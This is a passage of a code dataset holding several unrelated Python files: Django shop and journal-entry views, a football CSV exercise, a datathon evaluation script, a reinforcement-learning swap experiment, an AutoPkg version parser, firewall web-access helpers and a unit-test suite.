SearchProductForm( request.POST )\n\t\t\tfields = dict( [ ( key, request.POST[ key ] ) for key in form.fields.iterkeys() ] )\n\t\t\tif form.is_valid():\n\t\t\t\td.update( is_valid = True )\n\t\t\t\tq_dict.update( form.cleaned_data 
)\n\t\t\t\tsearch.set( **q_dict )\t\t\t\t\n\t\t\t\tshop = get_shop_by_name( request.session, shop_name )\n\t\t\t\tpage_products = ItemPage( Product ).get( q_dict = SearchView._removed_empty_items( form, q_dict ), page = 1 )\n\t\t\t\td.update( page = 1 )\n\t\t\telse:\n\t\t\t\td.update( is_valid = False )\n\t\t\t\tpage_products = None\n\t\telse:\n\t\t\tform = SearchProductForm()\n\n\t\t\tis_page = 'page' in req\n\t\t\tpage = int( req[ 'page' ] ) if is_page else 1\t\t\n\t\t\td.update( page = page )\n\n\t\t\tif search.is_set():\n\t\t\t\tfields = search.get()\n\t\t\t\tif is_page:\n\t\t\t\t\tfields.update( shop = self._shop_id )\n\t\t\t\t\tpage_products = ItemPage( Product ).get( q_dict = SearchView._removed_empty_items( form, search.get() ), page = page )\n\t\t\t\telse:\n\t\t\t\t\tpage_products = None\n\t\t\telse:\n\t\t\t\tfields = dict( [ ( key, form.fields[ key ].initial ) for key in form.fields.iterkeys() ] )\n\t\t\t\tpage_products = None\t\t\n\t\t\t\t\n\t\tif page_products:\n\t\t\tcart.add_in_cart_attr( page_products[ 'object_list' ] )\n\n\t\td.update( page_products = page_products )\n\t\t\n\t\td.update( form = form )\n\t\td.update( fields = fields )\n\n\t\td.update( dictionary )\n\t\t\n\t\treturn super( SearchView, self ).view( request, shop_name, d )\n\nclass ShopView( ShopBaseView ):\n\t\"\"\"\n\tA main shop view, displays products in the shop and state of a cart\n\t\"\"\"\n\tTEMPLATE = 'shops-index.html'\n\t \n\tdef view( self, request, shop_name ):\n\t\tLocation( request.session, 'shop' ).set( get_shop_location( shop_name, '', request.GET ) )\n\t\treq = request.REQUEST\n\t\tform_request = None\n\t\tpage = int( req[ 'page' ] ) if 'page' in req else 1\t\n\n\t\tq_dict = {}\n\t\tq_dict.update( shop = self._shop_id )\n\t\t\n\t\tif 'category' in req:\n\t\t\tcategory = int( req[ 'category' ] )\n\t\t\tq_dict.update( category = category )\n\t\telse:\n\t\t\tcategory = None\n\t\t\n\t\tpage_products = ItemPage( Product ).get( q_dict = q_dict, page = page )\n\t\t\n\t\tcart = Cart( request.session )\n\t\tcart.add_in_cart_attr( page_products[ 'object_list' ] )\n\n\t\treturn super( ShopView, self ).view( request, shop_name,\n\t\t\t\t\t\t\t\t\t\t\t\t{\t'page_products': page_products,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'page': int( page ),\n\t\t\t\t\t\t\t\t\t\t\t\t\t'num_products_on_page': NUM_ITEMS_ON_PAGE,\n\t\t\t\t\t\t\t\t\t\t\t\t\t'categories': get_sorted_by_name( get_field_list_from_meta( 'product_category', ShopProductCategory, 'shop', self._shop_id ) ),\n\t\t\t\t\t\t\t\t\t\t\t\t\t'category': category\n\t\t\t\t\t\t\t\t\t\t\t\t} )\n\nclass GoToOrdersOrToAdminView( ShopBaseView ):\n\t\"\"\"\n\tA view with 2 links - 'go-to-admin' or 'go-to-custom-order'\n\t\"\"\"\n\tTEMPLATE = \"shops-go-to-orders-or-to-admin.html\"\n\t\n\tdef view( self, request, shop_name ):\n\t\tsuper( GoToOrdersOrToAdminView, self ).view( request, shop_name )\n\nclass AboutView( ShopBaseView ):\n\t\"\"\"\n\t'About project' view\n\t\"\"\"\n\tTEMPLATE = \"shops-about.html\"\n\tdef view( self, request, shop_name ):\n\t\td = { 'delivery_cost': DELIVERY_COST }\n\t\treturn super( AboutView, self ).view( request, shop_name, d )\n\ndef _shops_list_view( inst, parent, request, d, user ):\n\t\"\"\"\n\tTo display a list of shops by several conditions\n\t\"\"\"\n\tq_dict = d[ 'q_dict' ]\n\treq = request.REQUEST\n\tpage = int( req[ 'page' ] ) if 'page' in req else 1\t\t\n\tshop_page = ItemPage( Shop )\n\tpage_shops = shop_page.get( q_dict = q_dict, page = page )\n\tdel d[ 'q_dict' ]\n\td.update( { 'page_shops': page_shops, 'page': page, 'user2': user 
} )\n\treturn parent.view( request, d )\n\nclass ShopsListView( TemplateView ):\n\tdef view( self, request, q_dict, user ):\n\t\treturn _shops_list_view( self, super( ShopsListView, self ), request, q_dict, user )\n\nclass LoginStateShopsListView( LoginStateView ):\n\tdef view( self, request, d, user ):\n\t\treturn _shops_list_view( self, super( LoginStateShopsListView, self ), request, d, user )\t\t\t\n \nclass ListByUserView( ShopsListView ):\n\t\"\"\"\n\t\tTo display shops by user with a username\n\t\"\"\"\n\tTEMPLATE = \"shops-list-by-user.html\"\n\n\tdef view( self, request, username ):\n\t\ttry:\n\t\t\treturn super( ListByUserView, self ).view( request, User.objects.get( username = username ) )\n\t\texcept User.DoesNotExist:\n\t\t\treturn super( ListByUserView, self ).view_no_shops( request )\n\nclass ListMyView( LoginStateShopsListView ):\n\t\"\"\"\n\tIt displays all shops by a current user - active or removed\n\t\"\"\"\n\tTEMPLATE = \"shops-list-my.html\"\n\n\tdef view( self, request ):\n\t\tq_dict = { 'user': request.user }\n\t\tif 'opt' in request.REQUEST:\n\t\t\topt = request.REQUEST[ 'opt' ]\n\t\telse:\n\t\t\topt = 'active'\n\n\t\tif opt == 'active':\n\t\t\tq_dict.update( is_removed = False )\n\t\telif opt == 'removed':\n\t\t\tq_dict.update( is_removed = True )\t\t\t\n\t\treturn super( ListMyView, self ).view( request, { 'q_dict': q_dict, 'opt': opt }, request.user )\n\nclass ListView( TemplateView ):\n\t\"\"\"\n\tDisplays all shops which are not removed\n\t\"\"\"\n\tTEMPLATE = 'shops-list.html'\n\n\tdef _get_query_dict( self ):\n\t\treturn {}\n\n\tdef view( self, request ):\n\t\treq = request.REQUEST\n\t\tpage = int( req[ 'page' ] ) if 'page' in req else 1\n\t\t\n\t\tshop_page = ItemPage( Shop )\n\t\tpage_shops = shop_page.get( q_dict = { 'is_removed': False }, page = page )\n\n\t\treturn super( ListView, self ).view( request, { 'page_shops': page_shops, 'page': page } )\n\nclass ProductView( BackOffsetShopBaseView ):\n\t\"\"\"\n\tA view of a custom product.\n\t\"\"\"\n\tTEMPLATE = \"shops-product.html\"\n\n\tdef view( self, request, shop_name, product_id ):\n\t\treq_get = request.GET\t\t\n\t\tproduct = Product.objects.get( id = int( product_id ) )\n\t\tshop_id = get_shop_id_by_name( request.session, shop_name )\n\n\t\tif product.shop.id != shop_id:\n\t\t\traise ProductNotInThisShopError( \"Product with id {0} not found in shop {1}\".format( product_id, self._shop_name ) )\t\t\n\t\tcart = Cart( request.session)\n\t\tin_cart = str( product.id ) in cart.as_dict()\n\n\t\tlocation = Location( request.session, 'shop' )\n\t\tif location.is_set():\n\t\t\tback = location.get()\n\t\telse:\n\t\t\tback = None\n\n\t\treturn super( ProductView, self ).view(\trequest, \n\t\t\t\t\t\t\t\t\t\t\t\tshop_name, \n\t\t\t\t\t\t\t\t\t\t\t\t{ \n\t\t\t\t\t\t\t\t\t\t\t\t\t'back': back, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'product': product, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'in_cart': in_cart, \n\t\t\t\t\t\t\t\t\t\t\t\t\t'opt': req_get[ 'opt' ] if 'opt' in req_get else None \n\t\t\t\t\t\t\t\t\t\t\t\t} )","sub_path":"trunk/project/dargent/shops/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"542102194","text":"# The football.csv file contains the results from the English Premier League. 
\n# The columns labeled ‘Goals’ and ‘Goals Allowed’ contain the total number of \n# goals scored for and against each team in that season (so Arsenal scored 79 goals \n# against opponents, and had 36 goals scored against them). Write a program to read the file, \n# then print the name of the team with the smallest difference in ‘for’ and ‘against’ goals.\n\nimport csv\nwith open('football.csv', newline = '') as csvfile:\n reader = csv.reader(csvfile)\n data = [row for row in reader]\n\ngd = [[row[0], abs(int(row[5])-int(row[6]))] for row in data[1:]]\ngd_min = min(gd, key = lambda x: x[1])[1]\n\n# I can't seem to figure out a more concise way to handle the scenario\n# where there is a tie for the smallest difference.\nfor row in gd:\n if row[1] == gd_min:\n print(row[0])\n","sub_path":"python/q8_parsing.py","file_name":"q8_parsing.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"197953478","text":"import csv\nimport pandas as pd\nimport numpy as np\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom .models import JournalentryModel\nfrom .forms import JournalentryForm\nfrom .modules import modules\n\n# Create your views here.\n\n@login_required\ndef indexfunc(request):\n template_name = './journalentryapp/index.html'\n model = JournalentryModel\n object_list = model.objects.all()\n filepath = \"journalentryapp/output/data.csv\"\n context = modules.module_sum(filepath, object_list)\n return render(request, template_name, context)\n\ndef signupfunc(request):\n template_name = './journalentryapp/signup.html'\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n try:\n user = User.objects.create_user(username, '', password)\n return redirect('index')\n except IntegrityError:\n return render(request, template_name, {'error':'このユーザーはすでに登録されています。'})\n return render(request, template_name, {})\n\ndef loginfunc(request):\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n return render(request, './journalentryapp/login.html', {})\n return render(request, './journalentryapp/login.html', {})\n\ndef logoutfunc(request):\n logout(request)\n return redirect('login')\n\ndef createfunc(request):\n template_name = './journalentryapp/create.html'\n model = JournalentryModel\n form = JournalentryForm(request.POST or None)\n context = {}\n if form.is_valid():\n form.save()\n modules.module_output(model)\n return redirect('index')\n context['form'] = form\n return render(request, template_name, context)\n\ndef deletefunc(request, pk):\n template_name = './journalentryapp/delete.html'\n context = {}\n model = JournalentryModel\n obj = get_object_or_404(JournalentryModel, pk=pk)\n if request.method == \"POST\":\n obj.delete()\n modules.module_output(model)\n return redirect('index')\n return render(request, template_name, context)\n\ndef updatefunc(request, pk):\n template_name = './journalentryapp/update.html'\n context = {}\n model = JournalentryModel\n obj = get_object_or_404(JournalentryModel, pk=pk)\n form = 
JournalentryForm(request.POST or None, instance=obj)\n if form.is_valid():\n form.save()\n modules.module_output(model)\n return redirect('index')\n context['form'] = form\n return render(request, template_name, context)\n\n@login_required\ndef glfunc(request):\n template_name = './journalentryapp/gl.html'\n model = JournalentryModel\n object_list = model.objects.all()\n print(object_list)\n data = pd.read_csv(filepath_or_buffer=\"journalentryapp/output/data.csv\", encoding=\"UTF-8\", sep=\",\")\n data['Dr.price'] = data['Dr.price'].astype(np.int64)\n data['Cr.price'] = data['Cr.price'].astype(np.int64)\n account_list = []\n for account in data['Dr.account']:\n if account not in account_list:\n account_list.append(account)\n for account in data['Cr.account']:\n if account not in account_list:\n account_list.append(account)\n context = {\n 'object_list': object_list,\n 'account_list': account_list,\n }\n return render(request, template_name, context)\n","sub_path":"journalentryapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"71546364","text":"import sys\nfrom typing import Dict, List\nimport pandas as pd\n\nfrom main import main\n\nfrom datathon_ai.interfaces import NOT_COUNTRY_QUESTIONS_NUMBERS\n\nCOUNTRY_QUESTION_ID_5 = [5, 6, 7]\nCOUNTRY_QUESTION_ID_7 = [9, 10]\nCOUNTRY_QUESTION_ID_8 = [11, 12]\nCOUNTRY_QUESTION_ID_14 = [18, 19, 20]\nCOUNTRY_GROUPED_QUESTIONS = [\n COUNTRY_QUESTION_ID_5, COUNTRY_QUESTION_ID_7, COUNTRY_QUESTION_ID_8, COUNTRY_QUESTION_ID_14\n]\n\n\ndef evalutate(annotation_path: str):\n \"\"\"\n Function that computes the accuracy of form filling.\n :param annotation_path: path of the csv annotation file\n :return:\n\n A special computation is done for the grouped questions. A grouped question is a list of questions associated to\n the same global question. For instance questions 5, 6, 7 are associated to global questions\n \"What are the mentionned recipient countries ?\". 
For each group question, we compute them in the method\n compute_grouped_metric.\n \"\"\"\n # Compute predictions and format it into a dataframe\n predictions = main()\n print(\"\\n###############\")\n print(\"RUNNING EVALUATION\")\n predictions = [\n {\"question_number\": question_number, \"response_id\": response_id}\n for question_number, response_id in predictions.items()\n ]\n predictions_df = pd.DataFrame(predictions)\n print(f\"Number of Predictions : {predictions_df.shape[0]}\")\n assert set(predictions_df.columns.tolist()) == {\"response_id\", \"question_number\"}\n\n # Load annotation file\n ground_truth_df = pd.read_csv(annotation_path)\n print(f\"Number of ground truth : {ground_truth_df.shape[0]}\")\n\n assert ground_truth_df.shape[0] == predictions_df.shape[0]\n assert set(ground_truth_df[\"question_number\"].unique().tolist()) == set(predictions_df[\"question_number\"].unique().tolist())\n\n # Join both dataframe on keys [\"question_number\", \"filename\"]\n df_evaluate = pd.merge(\n ground_truth_df, predictions_df, on=\"question_number\", suffixes=[\"_truth\", \"_prediction\"]\n )\n assert df_evaluate.shape[0] == predictions_df.shape[0]\n\n # Run evaluation : accuracy of filled forms (10 documents in documents_directory)\n print(\"###########################\")\n positive_results = 0\n res_by_questions: Dict[str, List[float]] = {}\n for i in range(0, 10):\n company_result = []\n for group in COUNTRY_GROUPED_QUESTIONS:\n group_formated = [question_number + i * 22 for question_number in group]\n score = compute_grouped_metric(df_evaluate, group_formated)\n company_result.append(score)\n group_string = \"|\".join([str(question_n) for question_n in group])\n if group_string in res_by_questions:\n res_by_questions[group_string].append(score)\n else:\n res_by_questions[group_string] = [score]\n for question in NOT_COUNTRY_QUESTIONS_NUMBERS:\n question_formated = question + i * 22\n df_filter_question = df_evaluate[(df_evaluate[\"question_number\"] == question_formated)]\n assert df_filter_question.shape[0] == 1\n truth_value = df_filter_question[\"response_id_truth\"].values[0]\n prediction = df_filter_question[\"response_id_prediction\"].values[0]\n if truth_value == prediction:\n score = 1\n else:\n score = 0\n company_result.append(score)\n if str(question) in res_by_questions:\n res_by_questions[str(question)].append(score)\n else:\n res_by_questions[str(question)] = [score]\n\n company_score = sum(company_result)/len(company_result)\n positive_results += company_score\n print(f\"COMPANY {i} : {company_score*100} % of form completion\")\n\n # Results by question_id\n print(\"\\n###########################\")\n for question in res_by_questions:\n score_question_details = res_by_questions[question]\n assert len(score_question_details) == 10\n print(f\"QUESTION {question} : {(sum(score_question_details)/10)*100} % of completion for all companies\")\n\n # GLOBAL RESULT\n global_result = positive_results / 10\n print(\"\\n###########################\")\n print(f\"MEAN RATIO OF FORM COMPLETION BY COMPANY : {global_result*100}\")\n\n\ndef compute_grouped_metric(df_evaluate: pd.DataFrame, questions_in_group: List[int]) -> float:\n \"\"\"\n Method that compute metric for a group question for a specific filename (ie company).\n :param df_evaluate: dataframe of evaluation merging predictions and ground truth annotations.\n Columns are : filename, question_number, response_id_truth, response_id_prediction\n :param questions_in_group: a list of questions number related to the same global 
question.\n :return: a score\n \"\"\"\n df_filter = df_evaluate[(df_evaluate[\"question_number\"].isin(questions_in_group))]\n assert df_filter.shape[0] == len(questions_in_group)\n # Exact match between the ground truth and prediction\n if df_filter[\"response_id_truth\"].equals(df_filter[\"response_id_prediction\"]):\n return 1\n # If ground truth first element is equaled to 0, then all ground truth elements in df_filter are equaled to 0.\n # It's due to annotation specification. So there is at least one element in response_id_prediction not equaled to 0.\n # So the score is 0.\n elif df_filter[\"response_id_truth\"].iloc[0] == 0:\n return 0\n\n # Compare prediction and ground truth by question if first element of ground truth is not null.\n else:\n i = 0\n res = []\n for i in range(len(questions_in_group)):\n ground_truth_q = df_filter[\"response_id_truth\"].iloc[i]\n pred_q = df_filter[\"response_id_prediction\"].iloc[i]\n if ground_truth_q != 0:\n if ground_truth_q == pred_q:\n res.append(1)\n else:\n res.append(0)\n elif pred_q != 0:\n res.append(0)\n\n return sum(res)/len(res)\n\n\nif __name__ == \"__main__\":\n annotation_path = sys.argv[1]\n evalutate(annotation_path)","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"116510923","text":"\"\"\"\nSwap input (rinp) on output (rout) with one extra registers (rtmp)\n\"\"\"\nimport pickle as pk\nimport itertools as it\nimport numpy as np\nimport torch as tr\nimport matplotlib.pyplot as pt\nfrom ghu import *\nfrom codec import Codec\nfrom controller import Controller\nfrom lvd import lvd\nfrom reinforce import reinforce\n\ndef swap_trial(distribution_variance_coefficient, save_file):\n\n # Configuration\n num_symbols = 10\n layer_sizes = {\"rinp\": 32, \"rout\":32, \"rtmp\": 32}\n hidden_size = 32\n rho = .99\n plastic = []\n num_episodes = 100\n\n # Setup GHU\n symbols = [str(a) for a in range(num_symbols)]\n pathways, associations = default_initializer( # all to all\n layer_sizes.keys(), symbols)\n codec = Codec(layer_sizes, symbols, rho=rho, ortho=True)\n controller = Controller(layer_sizes, pathways, hidden_size, plastic)\n ghu = GatedHebbianUnit(\n layer_sizes, pathways, controller, codec,\n batch_size = num_episodes, plastic = plastic)\n ghu.associate(associations)\n\n # Initialize layers\n separator = \"0\"\n ghu.fill_layers(separator)\n\n # Generate dataset\n all_inputs = list(it.permutations(symbols[1:],2))\n split = int(.80*len(all_inputs))\n\n # example generation\n def example(dataset):\n # Randomly choose echo symbol (excluding 0 separator)\n inputs = dataset[np.random.randint(len(dataset))]\n targets = inputs[::-1]\n return inputs, targets\n def training_example(): return example(all_inputs[:split])\n def testing_example(): return example(all_inputs[split:])\n \n # all or nothing reward\n def reward(ghu, targets, outputs):\n r = np.zeros(len(outputs))\n outputs = np.array([out for out in outputs[1:] if out != separator])\n if len(outputs) == len(targets): r[-1] = (targets == outputs).all()\n return r\n \n # Run optimization\n avg_rewards, avg_general, grad_norms = reinforce(ghu,\n num_epochs = 100,\n episode_duration = 3,\n training_example = training_example,\n testing_example = testing_example,\n reward = reward,\n task = \"swap\",\n learning_rate = .1,\n distribution_variance_coefficient = distribution_variance_coefficient,\n verbose = 1,\n save_file = save_file)\n\nif __name__ 
== \"__main__\":\n print(\"*******************************************************\")\n \n dvcs = [0.]\n # dvcs = [0., 0.001, 0.01, 0.1, 1.]\n # dvcs = [.0005, 0.005, 0.05, 0.5]\n # dvcs = [0., .0005, 0.001, .005, 0.01, .05, 0.1, .5, 1.]\n num_reps = 30\n save_base = \"results/swap/run_%f_%d.pkl\"\n \n # # Run the experiment\n # for dvc in dvcs:\n # for rep in range(num_reps):\n # save_file = save_base % (dvc, rep)\n # swap_trial(dvc, save_file)\n\n # Load results\n # dvcs = [0., .0005, 0.001, .005, 0.01, .05, 0.1, .5, 1.]\n results = {}\n for dvc in dvcs:\n results[dvc] = {}\n for rep in range(num_reps):\n save_file = save_base % (dvc, rep)\n with open(save_file,\"rb\") as f:\n results[dvc][rep] = pk.load(f)\n \n # Plot testing/generalization error\n results = results[0.]\n avg_rewards = np.array([results[rep][1] for rep in results.keys()]).T\n avg_general = np.array([results[rep][2] for rep in results.keys()]).T\n\n bg = (.9,.9,.9) # background color\n fg = (.1, .1, .1) # foreground color\n numsp = 2 # 3\n # pt.figure(figsize=(4.25,3.85))\n pt.figure(figsize=(4.25,2.6))\n pt.subplot(numsp,1,1)\n pt.plot(avg_rewards, c=bg, zorder=0)\n pt.plot(avg_rewards.mean(axis=1), c=fg, zorder=1, label = \"Average over %d trials\" % len(results))\n pt.legend(loc=\"lower right\")\n pt.ylabel(\"Train Rewards\")\n\n pt.subplot(numsp,1,2)\n pt.plot(avg_general, c=bg, zorder=0)\n pt.plot(avg_general.mean(axis=1), c=fg, zorder=1) #, label = \"Average over %d trials\" % len(results))\n # pt.legend(loc=\"lower right\")\n pt.ylabel(\"Test Rewards\")\n \n # pt.subplot(numsp,1,3)\n # pt.plot((avg_rewards-avg_general).T, c=bg, zorder=0)\n # pt.plot((avg_rewards-avg_general).mean(axis=0), c=fg, zorder=1) #, label=\"Avg. over %d trials\" % num_reps)\n # # pt.legend(loc=\"upper right\")\n # pt.ylabel(\"Train - Test\")\n # pt.xlabel(\"Epoch\")\n \n pt.tight_layout()\n pt.savefig(\"swap_curves.eps\")\n # pt.show()\n \n \n ### Old dvc plots \n # # Plot results\n # pt.figure(figsize=(4.25,1.85))\n # bg = (.9,.9,.9) # background color\n # # dvcs_sub = [0., 0.01, 1.]\n # # dvcs_sub = dvcs[:3]\n # dvcs_sub = dvcs\n # for d,dvc in enumerate(dvcs_sub):\n # avg_rewards = np.array([results[dvc][rep][2] # generalization\n # for rep in results[dvc].keys()]).T\n\n # pt.plot(avg_rewards, c=bg, zorder=0)\n # fg = tuple([float(d)/len(dvcs_sub)]*3) # foreground color\n # pt.plot(avg_rewards.mean(axis=1), c=fg, zorder=1, label=(\"$\\lambda$=%.2f\" % dvc))\n\n # pt.title(\"Testing set\")\n # pt.ylabel(\"Average Reward\")\n # pt.xlabel(\"Epoch\")\n # pt.legend(loc=\"lower right\")\n # pt.tight_layout()\n # pt.savefig('swap_learning_curves.eps')\n # pt.show()\n \n # # Histograms of final rewards\n # pt.figure(figsize=(4.25,2))\n # finals = []\n # for d,dvc in enumerate(dvcs):\n # avg_rewards = np.array([results[dvc][rep][1]\n # for rep in results[dvc].keys()]).T\n # finals.append(avg_rewards[-1,:])\n # # pt.boxplot(finals, showfliers=False)\n # means = [f.mean() for f in finals]\n # stds = [f.std() for f in finals]\n # pt.errorbar(range(len(dvcs)), means, fmt='ko', yerr=stds, capsize=10)\n\n # # pt.title(\"Final Average Rewards\")\n # pt.ylabel(\"Reward\")\n # pt.xlabel(\"$\\lambda$\")\n # # locs, _ = pt.xticks()\n # # pt.xticks(locs[1:-1], [\"%.1e\" % dvc for dvc in dvcs])\n # pt.xticks(range(len(dvcs)), [\"%.4f\" % dvc for dvc in dvcs], rotation=45)\n # pt.tight_layout()\n # pt.savefig('swap_finals.eps')\n # 
pt.show()\n\n\n","sub_path":"swap_experiments.py","file_name":"swap_experiments.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"251295548","text":"#!/usr/bin/env python\n\nimport re\nfrom autopkglib import Processor, ProcessorError\n\n__all__ = [\"FetchVersionParser\"]\n\nclass FetchVersionParser(Processor):\n '''Provides URL to the latest version.'''\n\n input_variables = {\n\t\t\t\"version\": {\n\t\t\t\t\"required\": True,\n\t\t\t\t\"description\": \"version string to parse.\",\n\t\t\t},\n }\n output_variables = {\n 'version': {\n 'description': 'The corrected version'\n }\n }\n\n description = __doc__\n\n def parse_version(self, v_string):\n version = re.sub(r'\\([^)]*\\)', '', v_string)\n return version.strip()\n\n def main(self):\n version = self.env['version']\n self.env['version'] = self.parse_version(version)\n self.output('Version: %s' % self.env['version'])\n\nif __name__ == '__main__':\n processor = FetchVersionParser()\n processor.execute_shell()","sub_path":"Fetch/FetchVersionParser.py","file_name":"FetchVersionParser.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"260576549","text":"from datetime import datetime, timedelta\nimport re\nimport socket\nimport subprocess\n\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import redirect, get_object_or_404\n\nfrom netaddr import EUI, IPAddress, mac_unix, AddrFormatError\n\nfrom .models import WebRequest\nfrom django.conf import settings\nfrom django.http import HttpResponse\n\n\"\"\"\nThis module contains web-access request specific Python functions for\ncommunicating with the firewall.\n\"\"\"\n\n\ndef _sendRaw(eui, minutes):\n \"\"\" Allows internet access on device with MAC address for some minutes\n\n Sends a string over a TCP socket to the firewall. 
Must be run on server\n accepted by firewall.\n \"\"\"\n if not isinstance(eui, EUI):\n raise ValueError(\"Expected eui to be of type EUI\")\n if not isinstance(minutes, int):\n raise ValueError(\"Expected minutes to be int\")\n eui.dialect = mac_unix\n eui.dialect.word_fmt = \"%.2X\"\n soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n soc.settimeout(1.0)\n soc.connect((settings.HOST, settings.PORT))\n soc.sendall(\"%s %d\" % (str(eui), minutes))\n soc.close()\n\n\ndef _getEUI(ipAddress, mac=\"\"):\n \"\"\" Returns EUI from IPAddress \"\"\"\n if not isinstance(ipAddress, IPAddress):\n raise ValueError(\"Expected ipAddress to be of type netaddr.IPAddress\")\n if mac == \"\":\n mac = _getMAC(ipAddress)\n # mac is None if testing on localhost\n if mac is None:\n return mac\n eui = EUI(mac)\n eui.dialect = mac_unix\n eui.dialect.word_fmt = \"%.2X\"\n return eui\n\n\ndef _getMAC(ipAddress):\n \"\"\" Get MAC from IP address \"\"\"\n proc = subprocess.Popen([\"arp\", \"-n\", str(ipAddress)], stdout=subprocess.PIPE)\n result = proc.communicate()[0]\n # Matches MAC address\n matches = re.search('\\s([a-zA-Z0-9]{1,2}(?::[a-zA-Z0-9]{1,2}){5})\\s', result, re.MULTILINE)\n if matches is None:\n return None\n return matches.group(1)\n\n\ndef _getIPAddress(request):\n \"\"\" Returns IPAddress object \"\"\"\n x_forwarded_for = request.META.get(\"HTTP_X_FORWARDED_FOR\", \"\") or request.META.get(\"REMOTE_ADDR\")\n return IPAddress(x_forwarded_for.split(',')[0])\n\n\ndef getRemoteAddress(request):\n return HttpResponse(_getMAC(_getIPAddress(request)))\n\n\ndef startAccess(request, id):\n ipAddress = _getIPAddress(request)\n eui = _getEUI(ipAddress)\n if not eui:\n message = \"Unable to get internet access. Could not get EUI from IP Address %s.\" % ipAddress\n messages.add_message(request, messages.ERROR, message)\n else:\n webRequest = get_object_or_404(WebRequest, pk=id)\n if not webRequest.time_started:\n webRequest.time_started = datetime.now()\n webRequest.save()\n minutes = int(round((webRequest.time_started - datetime.now() + timedelta(minutes=webRequest.minutes)).total_seconds() / 60))\n _sendRaw(eui, minutes)\n message = \"Web accesss granted for %s minutes.\" % minutes\n messages.add_message(request, messages.SUCCESS, message)\n # Redirect to original page. This request is sent from login and trainee web access list pages\n return redirect(request.META.get('HTTP_REFERER', reverse_lazy('home')))\n\n\ndef startAccessFromMacAddress(request, minutes, mac_address):\n try:\n eui = EUI(mac_address)\n except AddrFormatError:\n messages.add_message(request, messages.ERROR, \"Invalid MAC Address! 
Please check again.\")\n else:\n eui.dialect = mac_unix\n eui.dialect.word_fmt = \"%.2X\"\n _sendRaw(eui, int(minutes))\n messages.add_message(request, messages.SUCCESS, \"Internet access started for %s!\" % mac_address)\n","sub_path":"ap/web_access/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"458260907","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2019 Roberto Riggio\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Full unit test suite.\"\"\"\n\nimport unittest\nfrom .projects import TestProjects\nfrom .accounts import TestAccounts\nfrom .acls import TestACLs\nfrom .wtps import TestWTPs\nfrom .vbses import TestVBSes\nfrom .wifislices import TestWiFiSlices\nfrom .lteslices import TestLTESlices\nfrom .applications import TestApplications\nfrom .workers import TestWorkers\nfrom .alerts import TestAlerts\n\n\ndef full_suite():\n \"\"\"Full unit test suite.\"\"\"\n\n suite = unittest.TestSuite()\n\n suite.addTest(TestAlerts('test_create_new_alert'))\n suite.addTest(TestAlerts('test_create_new_alert_empty_body'))\n suite.addTest(TestAlerts('test_subscriptions'))\n suite.addTest(TestAlerts('test_update_alert'))\n suite.addTest(TestAlerts('test_wtps'))\n\n suite.addTest(TestWorkers('test_register_new_worker'))\n suite.addTest(TestWorkers('test_register_new_worker_fixed_uuid'))\n suite.addTest(TestWorkers('test_register_new_worker_duplicate_no_uuid'))\n suite.addTest(TestWorkers('test_register_new_worker_different_params'))\n suite.addTest(TestWorkers('test_register_new_worker_duplicate_uuid'))\n suite.addTest(TestWorkers('test_register_new_worker_invalid_creds'))\n suite.addTest(TestWorkers('test_register_existing_worker'))\n suite.addTest(TestWorkers('test_modify_worker_invalid_param_name'))\n suite.addTest(TestWorkers('test_modify_worker_param'))\n suite.addTest(TestWorkers('test_modify_worker_invalid_param_value'))\n suite.addTest(TestWorkers('test_add_callback'))\n\n suite.addTest(TestAccounts('test_simple_gets'))\n suite.addTest(TestAccounts('test_create_existing_user'))\n\n suite.addTest(TestAccounts('test_create_new_user_missing_field'))\n\n suite.addTest(TestAccounts('test_create_new_user'))\n suite.addTest(TestAccounts('test_update_user_details'))\n suite.addTest(TestAccounts('test_credentials'))\n\n suite.addTest(TestProjects('test_simple_gets'))\n suite.addTest(TestProjects('test_create_new_project'))\n suite.addTest(TestProjects('test_create_wifi_project'))\n suite.addTest(TestProjects('test_create_wifi_project_default_bssid_type'))\n suite.addTest(TestProjects('test_create_wifi_project_wrong_bssid_type'))\n suite.addTest(TestProjects('test_create_lte_project'))\n suite.addTest(TestProjects('test_create_lte_project_wrong_plmnid'))\n\n suite.addTest(TestACLs('test_add_acls'))\n suite.addTest(TestACLs('test_add_acls_invalid_creds'))\n 